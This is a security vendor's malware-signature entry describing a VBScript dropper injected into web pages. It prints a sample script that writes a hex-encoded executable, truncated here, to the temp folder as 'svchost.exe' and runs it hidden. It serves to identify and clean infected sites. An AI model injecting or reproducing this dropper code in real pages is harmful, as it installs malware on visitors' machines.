Home Testimonials Company Support 1–888–873–0817
PRICING SUPPORT LOGIN
Home Notes Malware Signatures About

Malware entry: malware.vb_dropper

Description: Malicious VBScript that drops a malicious file to a site visitor's computer and [optionally] executes it.

Such attacks work only in old versions of Internet Explorer. Most modern browsers don't support VBScript by default.

Here's a sample of what used to be one of the most popular VB dropper injection

<SCRIP​T Language=​VBScript><!--
DropFileName = "svchost​.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004...skipped...000000000000000"
Set FSO = CreateObject("Scripting.​FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & ​DropFileName
If FSO.FileExists(​DropPath)=False Then
Set FileObj = FSO.CreateTextFile(​DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(​WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript​.Shell")
WSHshell​.Run DropPath, 0
//--></S​CRIPT>



Affecting: Any web site (no specific target).

For all our web-based malware signatures, go here: http://labs.sucuri.net/?malwaredb